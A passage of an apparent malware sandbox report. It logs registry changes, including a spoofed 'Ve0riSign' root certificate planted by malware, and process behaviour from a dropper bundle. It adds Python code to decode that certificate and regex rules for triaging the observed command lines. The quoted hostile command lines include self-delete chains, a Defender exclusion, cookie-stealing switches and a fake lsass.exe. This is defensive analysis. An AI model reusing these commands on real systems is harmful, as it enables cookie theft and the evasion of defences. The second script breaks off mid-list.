Set value (int)       \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\PrivacyAdvanced = "0"  MicrosoftEdge.exe
Set value (int)       \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\Cookies\CacheLimit = "1"  MicrosoftEdgeCP.exe
Set value (int)       \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\SmartScreenCompletedVersion = "1"  MicrosoftEdge.exe
Key created           \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Zoom  MicrosoftEdge.exe
Set value (int)       \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\SubSysId = "0"  MicrosoftEdge.exe
Key created           \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Software\Microsoft\SystemCertificates\trust  MicrosoftEdgeCP.exe
Key created           \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\CA\CTLs  MicrosoftEdge.exe
Set value (str)       \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:"  MicrosoftEdgeCP.exe
Key created           \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Software\Microsoft\SystemCertificates\CA\Certificates  MicrosoftEdgeCP.exe
Key created           \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Software\Microsoft\SystemCertificates\Root\CTLs  MicrosoftEdgeCP.exe
Set value (int)       \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContain
er\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\TreeView = "1"  MicrosoftEdge.exe
Key created           \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs  MicrosoftEdgeCP.exe
Key created           \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\ACGStatus  sc.exe

Processes:
description | ioc | process
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC | Setup.tmp
Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA\Blob = … | Esplorarne.exe.com
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC | Esplorarne.exe.com
Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\EDD4B1559255EDD0ADB9D0DA108ABA221CA10AB4\Blob = … | RUNDLL32.EXE
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\EDD4B1559255EDD0ADB9D0DA108ABA221CA10AB4 | RUNDLL32.EXE
Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\EDD4B1559255EDD0ADB9D0DA108ABA221CA10AB4\Blob = … | RUNDLL32.EXE
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\EDD4B1559255EDD0ADB9D0DA108ABA221CA10AB4 | FBFC.exe
Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\EDD4B1559255EDD0ADB9D0DA108ABA221CA10AB4\Blob = 5c00000001000000040000000004000019000000010000001000000070f978f1c877bc8a437fe55f408e342e0f0000000100000020000000c0e18a8cf9c6795cd51462a257943cec8893f6b235f4dc34103182ce7ebbb22f030000000100000014000000edd4b1559255edd0adb9d0da108aba221ca10ab414000000010000001400000006b5bc82432489e9d902a68eb6772cbeae0b91ca040000000100000010000000c2dc8895b1723efeb18c611f97deac572000000001000000ec020000308202e830820251a003020102020874af2d9114d41e4b300d06092a864886f70d01010b05003081863146304406035504030c3d56653072695369676e20436c6173732033205075626c6963205072696d6172792043657274696669636174696f6e20417574686f72697479202d204735311b3019060355040b0c1222286329203230303620566572695369676e31123010060355040a0c0922566572695369676e310b3009060355040613025553301e170d3139303832353132323332315a170d3233303832343132323332315a3081863146304406035504030c3d56653072695369676e20436c6173732033205075626c6963205072696d6172792043657274696669636174696f6e20417574686f72697479202d204735311b3019060355040b0c1222286329203230303620566572695369676e31123010060355040a0c0922566572695369676e310b300906035504061302555330819f300d06092a864886f70d010101050003818d0030818902818100c91e94712e8fb5b2578f14350940415f7b86ad019031c2c6ac9fdfec47cff9d93a4046627d16c817aa0d994fc25280487e82fe650d87992b56240dfbbd3828e5d311112248379a4e54121b4c37e7c32fbff13f32834c35095d76a4f3e220223abe36bb5c22870f46aea1c377ceeae9e476aaa8ca4e26c9262985bb671609353b0203010001a35d305b300f0603551d130101ff040530030101ff30480603551d110441303f823d56653072695369676e20436c6173732033205075626c6963205072696d6172792043657274696669636174696f6e20417574686f72697479202d204735300d06092a864886f70d01010b050003818100723d1aa0711e110572274040b91a24679030b90bccf2f219dabf7c677b66c8765294490d43caf97282745aebae8afe65c68fc1e8eb4b976ae3bbb2a0c7d4b5bae7be02a1ae00f31a78d7f9f6375665d0ffaad4794de71eb03014b8709a7b806fbbb1f0395fa8f4e672c95a103017dee4df89e4789ec4fafecf1ae2af4087af56 | FBFC.exe
Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC\Blob = … | Setup.tmp
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA | Setup.tmp
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\EDD4B1559255EDD0ADB9D0DA108ABA221CA10AB4 | RUNDLL32.EXE
Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\EDD4B1559255EDD0ADB9D0DA108ABA221CA10AB4\Blob = … | Esplorarne.exe.com
Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA\Blob = … | Setup.tmp
Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = … | Esplorarne.exe.com
Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\EDD4B1559255EDD0ADB9D0DA108ABA221CA10AB4\Blob = … | Esplorarne.exe.com
Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\EDD4B1559255EDD0ADB9D0DA108ABA221CA10AB4\Blob = … | FBFC.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43 | Esplorarne.exe.com
Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = … | Esplorarne.exe.com
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA | Esplorarne.exe.com
Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC\Blob = … | Esplorarne.exe.com
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\EDD4B1559255EDD0ADB9D0DA108ABA221CA10AB4 | Esplorarne.exe.com
Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\EDD4B1559255EDD0ADB9D0DA108ABA221CA10AB4\Blob = … | Esplorarne.exe.com
-
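The one Blob the report reproduces in full (the ROOT entry written by FBFC.exe; RUNDLL32.EXE and Esplorarne.exe.com write the same key) can be decoded offline. A SystemCertificates Blob value is a CertificateBlob: a sequence of records of the form property id (DWORD), reserved (DWORD, always 1), length (DWORD), data. Property 32 (CERT_CERT_PROP_ID) holds the DER certificate, property 3 (CERT_SHA1_HASH_PROP_ID) its SHA-1 thumbprint, which is also the registry key name, and property 92 (CERT_SUBJECT_PUB_KEY_BIT_LENGTH_PROP_ID) the key size. The following is an added example, not part of the sandbox output: it splits the blob, checks that the thumbprint in the key name really is the SHA-1 of the certificate inside, and summarises that certificate. Decoded, the entry is a self-signed 1024-bit RSA root whose subject CN is "Ve0riSign Class 3 Public Primary Certification Authority - G5" (a digit zero inserted into "VeriSign"), valid 2019-08-25 to 2023-08-24, with basicConstraints CA:TRUE; once it sits in ROOT, anything chaining to it passes TLS and Authenticode checks on that host. The property-ID constants are the wincrypt.h values; the DER walker is the minimum needed to read names, serial and validity and is not a general X.509 parser. The TrustedPublisher and AuthRoot blobs are not shown on this page, so only the ROOT one is decoded.

```python
"""Decode a SystemCertificates\\...\\Certificates\\<thumbprint>\\Blob value.

Added example for this report, not part of the sandbox output. Property IDs
are the wincrypt.h CERT_*_PROP_ID values; the DER walker handles only what
is needed to read subject, issuer, serial and validity."""
import hashlib
import struct
from typing import Dict, List, Tuple

CERT_SHA1_HASH_PROP_ID = 3                    # SHA-1 thumbprint of the DER cert
CERT_CERT_PROP_ID = 32                        # the DER-encoded certificate
CERT_SUBJECT_PUB_KEY_BIT_LENGTH_PROP_ID = 92  # DWORD, public key size in bits
OID_COMMON_NAME = b"\x55\x04\x03"             # id-at-commonName (2.5.4.3)

# ROOT\Certificates\EDD4B1...\Blob as written by FBFC.exe, copied verbatim from
# the report; whitespace is layout only (bytes.fromhex skips it).
ROOT_BLOB_HEX = """
5c000000010000000400000000040000 19000000010000001000000070f978f1c877bc8a437fe55f408e342e
0f0000000100000020000000c0e18a8cf9c6795cd51462a257943cec8893f6b235f4dc34103182ce7ebbb22f
030000000100000014000000edd4b1559255edd0adb9d0da108aba221ca10ab4
14000000010000001400000006b5bc82432489e9d902a68eb6772cbeae0b91ca
040000000100000010000000c2dc8895b1723efeb18c611f97deac57 2000000001000000ec020000
308202e830820251a003020102020874af2d9114d41e4b300d06092a864886f70d01010b0500
3081863146304406035504030c3d
56653072695369676e20436c6173732033205075626c6963205072696d6172792043657274696669636174696f6e20417574686f72697479202d204735
311b3019060355040b0c1222286329203230303620566572695369676e31123010060355040a0c0922566572695369676e310b3009060355040613025553
301e170d3139303832353132323332315a170d3233303832343132323332315a
3081863146304406035504030c3d
56653072695369676e20436c6173732033205075626c6963205072696d6172792043657274696669636174696f6e20417574686f72697479202d204735
311b3019060355040b0c1222286329203230303620566572695369676e31123010060355040a0c0922566572695369676e310b3009060355040613025553
30819f300d06092a864886f70d010101050003818d0030818902818100
c91e94712e8fb5b2578f14350940415f7b86ad019031c2c6ac9fdfec47cff9d93a4046627d16c817aa0d994fc25280487e82fe650d87992b56240dfbbd3828e5
d311112248379a4e54121b4c37e7c32fbff13f32834c35095d76a4f3e220223abe36bb5c22870f46aea1c377ceeae9e476aaa8ca4e26c9262985bb671609353b
0203010001a35d305b300f0603551d130101ff040530030101ff30480603551d110441303f823d
56653072695369676e20436c6173732033205075626c6963205072696d6172792043657274696669636174696f6e20417574686f72697479202d204735
300d06092a864886f70d01010b050003818100
723d1aa0711e110572274040b91a24679030b90bccf2f219dabf7c677b66c8765294490d43caf97282745aebae8afe65c68fc1e8eb4b976ae3bbb2a0c7d4b5ba
e7be02a1ae00f31a78d7f9f6375665d0ffaad4794de71eb03014b8709a7b806fbbb1f0395fa8f4e672c95a103017dee4df89e4789ec4fafecf1ae2af4087af56
"""


def parse_blob(blob: bytes) -> Dict[int, bytes]:
    """Split a CertificateBlob into {property_id: data}."""
    props: Dict[int, bytes] = {}
    off = 0
    while off < len(blob):
        prop_id, reserved, length = struct.unpack_from("<III", blob, off)
        off += 12
        if reserved != 1 or off + length > len(blob):
            raise ValueError(f"malformed property {prop_id} at offset {off - 12}")
        props[prop_id] = blob[off:off + length]
        off += length
    return props


def _tlv(buf: bytes, off: int) -> Tuple[int, int, int]:
    """Return (tag, value_start, value_end) of the DER TLV at off."""
    tag, ln = buf[off], buf[off + 1]
    hdr = 2
    if ln & 0x80:                              # long-form length
        n = ln & 0x7F
        ln = int.from_bytes(buf[off + 2:off + 2 + n], "big")
        hdr += n
    return tag, off + hdr, off + hdr + ln


def _children(buf: bytes, start: int, end: int) -> List[Tuple[int, int, int]]:
    out, off = [], start
    while off < end:
        node = _tlv(buf, off)
        out.append(node)
        off = node[2]
    return out


def _common_name(der: bytes, name: Tuple[int, int, int]) -> str:
    """CN from an X.501 Name: SEQUENCE of SET of SEQUENCE { OID, value }."""
    for _, rs, re_ in _children(der, name[1], name[2]):
        for _, vs, ve in _children(der, rs, re_):
            oid, val = _children(der, vs, ve)
            if der[oid[1]:oid[2]] == OID_COMMON_NAME:
                return der[val[1]:val[2]].decode("utf-8", "replace")
    return ""


def summarize_cert(der: bytes) -> dict:
    _, cs, ce = _tlv(der, 0)                   # Certificate
    _, ts, te = _tlv(der, cs)                  # tbsCertificate
    fields = _children(der, ts, te)
    if fields[0][0] == 0xA0:                   # optional [0] EXPLICIT version
        fields = fields[1:]
    serial, _alg, issuer, validity, subject = fields[:5]
    not_before, not_after = _children(der, validity[1], validity[2])
    return {
        "serial": der[serial[1]:serial[2]].hex(),
        "issuer_cn": _common_name(der, issuer),
        "subject_cn": _common_name(der, subject),
        "not_before": der[not_before[1]:not_before[2]].decode(),
        "not_after": der[not_after[1]:not_after[2]].decode(),
        "self_signed": der[issuer[1]:issuer[2]] == der[subject[1]:subject[2]],
    }


def check_store_entry(key_name: str, blob: bytes) -> dict:
    """Decode the blob and confirm the registry key name is the cert's SHA-1."""
    props = parse_blob(blob)
    der = props[CERT_CERT_PROP_ID]
    info = summarize_cert(der)
    thumb = hashlib.sha1(der).hexdigest()
    info["sha1"] = thumb
    info["key_name_matches"] = thumb == key_name.lower() == props[CERT_SHA1_HASH_PROP_ID].hex()
    bits = props.get(CERT_SUBJECT_PUB_KEY_BIT_LENGTH_PROP_ID)
    info["pubkey_bits"] = int.from_bytes(bits, "little") if bits else None
    info["props"] = sorted(props)
    return info


if __name__ == "__main__":
    for k, v in check_store_entry("EDD4B1559255EDD0ADB9D0DA108ABA221CA10AB4",
                                  bytes.fromhex(ROOT_BLOB_HEX)).items():
        print(f"{k:18} {v}")
```

On a live host the same check is `certutil -store Root EDD4B1559255EDD0ADB9D0DA108ABA221CA10AB4`, which prints the subject and thumbprint for that key. A ROOT entry whose subject imitates a public CA but is self-signed with a 1024-bit key has no legitimate reason to exist; remove it and treat the processes that wrote it as malicious rather than as installers that happened to need a certificate.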
Runs ping.exe 1 TTPs 2 IoCs
-
Script User-Agent 32 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description | flow | ioc
HTTP User-Agent header | all 32 flows: 181, 214, 215, 222, 231, 363, 164, 232, 278, 345, 404, 412, 492, 194, 224, 228, 450, 196, 241, 173, 220, 355, 367, 373, 429, 400, 202, 311, 368, 430, 174, 372 | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
This string is the default User-Agent of the WinHttp.WinHttpRequest.5.1 COM object, i.e. the one VBScript/JScript and other script-host downloaders send when they do not set their own; a browser never sends it.
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
pid process
3968 Setup (13).exe (x2)
3768 Esplorarne.exe.com (x2)
4540 WerFault.exe (x19)
840 (no name shown) (x19)
3784 GZCE7lNx2wr8c3GHhY6VpQGL.exe (x2)
4132 WerFault.exe (x20)
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
pid process
2504 (no name shown)
-
Suspicious behavior: MapViewOfSection 64 IoCs
Processes:
pid process
3784 GZCE7lNx2wr8c3GHhY6VpQGL.exe
7048 lV0cLJRjBoCNp3_nrE9Ro2WP.exe
6792 0cec99sYPHC4JtcYL6Dyhoy2.exe
2504 (no name shown) (x36)
6828 Esplorarne.exe.com
7868 explorer.exe (x6)
6860 explorer.exe (x6)
2572 explorer.exe (x6)
8356 explorer.exe (x6)
-
Suspicious behavior: SetClipboardViewer 1 IoCs
Processes:
pid process
3104 1700239.exe
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
description pid process
Token: SeDebugPrivilege 3768 xRxZGAoA5TFUm46yqDqWyLKe.exe
Token: SeDebugPrivilege 2584 HvRdJvYAphkP2BshkAtGWhQa.exe
Token: SeDebugPrivilege 3736 xSrL1QRuFcmsVaGKJ6KvkP1I.exe
Token: SeRestorePrivilege 4540 WerFault.exe
Token: SeBackupPrivilege 4540 WerFault.exe
Token: SeDebugPrivilege 4540 WerFault.exe
Token: SeDebugPrivilege 4812 j_16kKcB4jVgGPLP0gdjWZI_.exe
Token: SeDebugPrivilege 2772 CW9iZUPnTLWFDj2aH5MN_4dK.exe
Token: SeDebugPrivilege 4532 sr1e6evbYvPSPR1h8l_TGwVu.exe
Token: SeDebugPrivilege 2172 Mh9JAL13r0v0BmNX5FgEGHKj.exe
Token: SeDebugPrivilege 2696 VQF2oO7acvvovPhrwKWLMcyD.exe
Token: SeDebugPrivilege 2660 GcpFYsjX4UKHyKnErFNxlep5.exe
Token: SeDebugPrivilege 840 (no name shown)
Token: SeDebugPrivilege 4572 taskkill.exe
Token: SeDebugPrivilege 4132 WerFault.exe
Token: SeDebugPrivilege 1732 WerFault.exe
Token: SeDebugPrivilege 2072 WerFault.exe
Token: SeDebugPrivilege 4072 mgBOJpLraGK2Wlg_GsNS8POH.exe
Token: SeDebugPrivilege 5320 xRxZGAoA5TFUm46yqDqWyLKe.exe
Token: SeDebugPrivilege 6040 WerFault.exe
Token: SeShutdownPrivilege then SeCreatePagefilePrivilege 2504 (no name shown) (4 pairs, interleaved with the rundll32.exe entries)
Token: SeDebugPrivilege 4412 rundll32.exe (x11)
Token: SeDebugPrivilege 2536 svchost.exe
Token: SeDebugPrivilege 5796 taskkill.exe
Token: SeAssignPrimaryTokenPrivilege, SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemtimePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeSystemEnvironmentPrivilege, SeUndockPrivilege (x2 each) and SeManageVolumePrivilege (x1) 2548 svchost.exe
-
Suspicious use of FindShellTrayWindow 64 IoCs
Processes:
pid process
2596 3bddbg9jWr7Ig8wwsIl8rRbl.tmp
5100 Cleaner Installation.exe
2504 (no name shown) (x2)
4136 Inlog.tmp
4356 WEATHER Manager.tmp
4620 w32tm.exe
1660 Stats.tmp
6280 Setup.exe
6804 zihUYffJhyVU5DT9YIToGAck.tmp
8116 Esplorarne.exe.com
7176 Setup.tmp
4932 ultramediaburner.tmp
8124 Esplorarne.exe.com
7176 Setup.tmp (x50)
-
Suspicious use of SendNotifyMessage 64 IoCs
Processes:
pid process
8680 7F4.exe (x3)
9068 Esplorarne.exe.com (x3)
4952 Esplorarne.exe.com (x3)
6888 Esplorarne.exe.com (x3)
8580 Esplorarne.exe.com (x3)
8444 Esplorarne.exe.com (x3)
4676 Conhost.exe (x3)
8256 Esplorarne.exe.com (x3)
5716 Esplorarne.exe.com (x3)
8800 MicrosoftEdgeCP.exe (x3)
2544 Esplorarne.exe.com (x3)
6484 Esplorarne.exe.com (x3)
1752 Esplorarne.exe.com (x3)
2856 Esplorarne.exe.com (x3)
6956 Esplorarne.exe.com (x3)
3564 Esplorarne.exe.com (x3)
4464 Esplorarne.exe.com (x3)
9144 Esplorarne.exe.com (x3)
388 Esplorarne.exe.com (x3)
8984 Esplorarne.exe.com (x3)
6636 Esplorarne.exe.com (x3)
4632 Esplorarne.exe.com
-
Suspicious use of SetWindowsHookEx 23 IoCs
Processes:
pid process
5928 builder.exe
2504 (no name shown)
6564 MicrosoftEdge.exe
972 cmd.exe
6392 sc.exe
8844 MaskVPNUpdate.exe
8528 Esplorarne.exe.com
8800 MicrosoftEdgeCP.exe
8272 Esplorarne.exe.com
8800 MicrosoftEdgeCP.exe
6012 Esplorarne.exe.com
3064 MicrosoftEdgeCP.exe (x2)
2736 lsass.exe
1416 MicrosoftEdge.exe
5456 MicrosoftEdgeCP.exe (x2)
5144 MicrosoftEdge.exe
5384 MicrosoftEdgeCP.exe (x2)
9060 MicrosoftEdge.exe
64 MicrosoftEdgeCP.exe (x2)
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
description pid process target process
PID 3968 (Setup (13).exe) wrote to memory of:
1412 lscm9tUiznW_ZuLtt7SqvXzl.exe (x3)
2804 4b5m9Xjbeh4Y9rTVY8V4famT.exe (x3)
2240 9NeY7wDiJGhrvsW_GspXT3lp.exe (x3)
2172 Mh9JAL13r0v0BmNX5FgEGHKj.exe (x3)
3784 GZCE7lNx2wr8c3GHhY6VpQGL.exe (x3)
4092 BOa2qC4wspxHZVE1pYCFRlSJ.exe (x2)
3220 sr1e6evbYvPSPR1h8l_TGwVu.exe (x3)
2508 iHIn3Sm9ab4PCPMlOJLksIeI.exe (x2)
2100 C5r_nTDxijl_qNhbR__JA8UL.exe (x3)
2584 HvRdJvYAphkP2BshkAtGWhQa.exe (x2)
2660 GcpFYsjX4UKHyKnErFNxlep5.exe (x3)
1944 YtTnmDnMr8kYIzzObFT55Rkd.exe (x3)
1912 j_16kKcB4jVgGPLP0gdjWZI_.exe (x3)
4072 mgBOJpLraGK2Wlg_GsNS8POH.exe (x3)
3736 xSrL1QRuFcmsVaGKJ6KvkP1I.exe (x3)
484 Xq_nEPqQVaJIj4O11jOJH7Fl.exe (x3)
3768 xRxZGAoA5TFUm46yqDqWyLKe.exe (x2)
2696 VQF2oO7acvvovPhrwKWLMcyD.exe (x3)
2684 tuuN5KFkdh6HTJMT2aKyIIjj.exe (x3)
2628 zGFs3qgZ52GcHMqEBczEQ9x9.exe (x3)
2772 CW9iZUPnTLWFDj2aH5MN_4dK.exe (x3)
1392 ySzhlkxv6lvVdaZGAMZc3MjG.exe (x3)
1184 sbqPAgkI_05eWSEnnOqyIFuT.exe (x2)
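The process tree that follows is long, but a handful of its command lines carry most of the signal: mshta.exe running an inline vbscript: that copies the dropper with type, relaunches the copy with an argument and kills the original; two cmd.exe chains of the form taskkill ... /f & del|erase that remove a dropped file after it has run; a batch file from Temp whose children are chcp 65001, w32tm /stripchart ... /samples:2 (a short delay) and a dropped lsass.exe under C:\Windows\System32\DscTimer (the real lsass.exe lives directly in System32); 11111.exe, 22222.exe and jfiag3g_gg.exe, whose /scookiestxt, /CookiesFile and /DeleteCookiesWildcard switches match NirSoft's ChromeCookiesView/EdgeCookiesView, exporting Chrome and Edge cookies to fj4ghga23_fsa.txt and deleting *.facebook.com cookies; rundll32.exe loading SBQPAG~1.DLL from Documents, followed by powershell Add-MpPreference -ExclusionPath for that DLL, which exempts it from Defender scanning; and three extensionless files in AppData\Roaming started under the Schedule service host. The following added example (not part of the report) turns those observations into regular-expression rules and runs them over command lines copied from the tree. Proc, Finding, the rule names, the severities and the expected-directory table are this example's own choices, not sandbox signatures.

```python
"""Rule-based triage of the command lines in a sandbox process tree.

Added example for this report, not part of the sandbox output. Proc, Finding,
the rule names, severities and EXPECTED_DIR are this example's choices; the
command lines in EVENTS are copied from the tree (depth = nesting level)."""
import re
from dataclasses import dataclass
from typing import List


@dataclass(frozen=True)
class Proc:
    image: str      # image path column of the tree
    cmdline: str    # command line column of the tree
    depth: int


@dataclass(frozen=True)
class Finding:
    rule: str
    severity: str
    proc: Proc


# (rule name, case-insensitive regex over the command line, severity)
CMDLINE_RULES = [
    ("mshta inline script", r'mshta\.exe"?\s+(vbscript|javascript):', "high"),
    ("defender exclusion added", r"add-mppreference\s+-exclusionpath", "high"),
    ("rundll32 loads DLL from user profile", r"rundll32\.exe\s+c:\\users\\\S+\.dll,", "high"),
    ("cookie export/delete switches", r"/scookiestxt|/deletecookieswildcard", "high"),
    ("self-delete via taskkill then del/erase", r"taskkill\b.*?/f\b.*\b(del|erase)\b", "medium"),
    ("copy-via-type and relaunch", r"\btype\b.*?>\s*\S+\.exe\s*&&\s*start\b", "medium"),
    ("script run from Temp", r'\\temp\\[^\s"]+\.(bat|cmd|vbs|js|ps1)\b', "medium"),
    ("extensionless file run from AppData Roaming",
     r'^"?c:\\users\\[^"\s]*\\appdata\\roaming\\[^"\s\\.]+"?$', "medium"),
    ("w32tm stripchart used as delay", r"w32tm\s+/stripchart", "low"),
]
MASQUERADE_RULE = ("system binary outside its expected directory", "high")
_COMPILED = [(name, re.compile(rx, re.I), sev) for name, rx, sev in CMDLINE_RULES]

# Directories (lower-case) in which these Windows binaries legitimately live.
EXPECTED_DIR = {
    "lsass.exe": {r"c:\windows\system32"},
    "svchost.exe": {r"c:\windows\system32", r"c:\windows\syswow64"},
    "explorer.exe": {r"c:\windows"},
}


def masquerading_system_binary(image: str) -> bool:
    """True when a well-known system binary name runs from an unexpected directory."""
    directory, _, name = image.lower().rpartition("\\")
    return name in EXPECTED_DIR and directory not in EXPECTED_DIR[name]


def rules_for(proc: Proc) -> List[str]:
    hits = [name for name, rx, _ in _COMPILED if rx.search(proc.cmdline)]
    if masquerading_system_binary(proc.image):
        hits.append(MASQUERADE_RULE[0])
    return hits


def triage(events: List[Proc]) -> List[Finding]:
    """All findings, highest severity first, shallower tree depth first."""
    severity = {name: sev for name, _, sev in CMDLINE_RULES}
    severity[MASQUERADE_RULE[0]] = MASQUERADE_RULE[1]
    rank = {"high": 0, "medium": 1, "low": 2}
    found = [Finding(r, severity[r], p) for p in events for r in rules_for(p)]
    return sorted(found, key=lambda f: (rank[f.severity], f.proc.depth))


# Command lines copied from the process tree on this page.
EVENTS = [
    Proc(r"c:\windows\system32\svchost.exe", r"c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection", 1),
    Proc(r"C:\Users\Admin\AppData\Roaming\afgfbwi", r"C:\Users\Admin\AppData\Roaming\afgfbwi", 2),
    Proc(r"C:\Windows\SysWOW64\cmd.exe", r'"C:\Windows\System32\cmd.exe" /c taskkill /im C5r_nTDxijl_qNhbR__JA8UL.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\C5r_nTDxijl_qNhbR__JA8UL.exe" & del C:\ProgramData\*.dll & exit', 3),
    Proc(r"C:\Windows\SysWOW64\cmd.exe", r'"C:\Windows\System32\cmd.exe" /c taskkill /im "YtTnmDnMr8kYIzzObFT55Rkd.exe" /f & erase "C:\Users\Admin\Documents\YtTnmDnMr8kYIzzObFT55Rkd.exe" & exit', 3),
    Proc(r"C:\Windows\System32\cmd.exe", r'"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\G0PS2zVnoL.bat"', 4),
    Proc(r"C:\Windows\system32\w32tm.exe", r"w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2", 5),
    Proc(r"C:\Windows\System32\DscTimer\lsass.exe", r'"C:\Windows\System32\DscTimer\lsass.exe"', 5),
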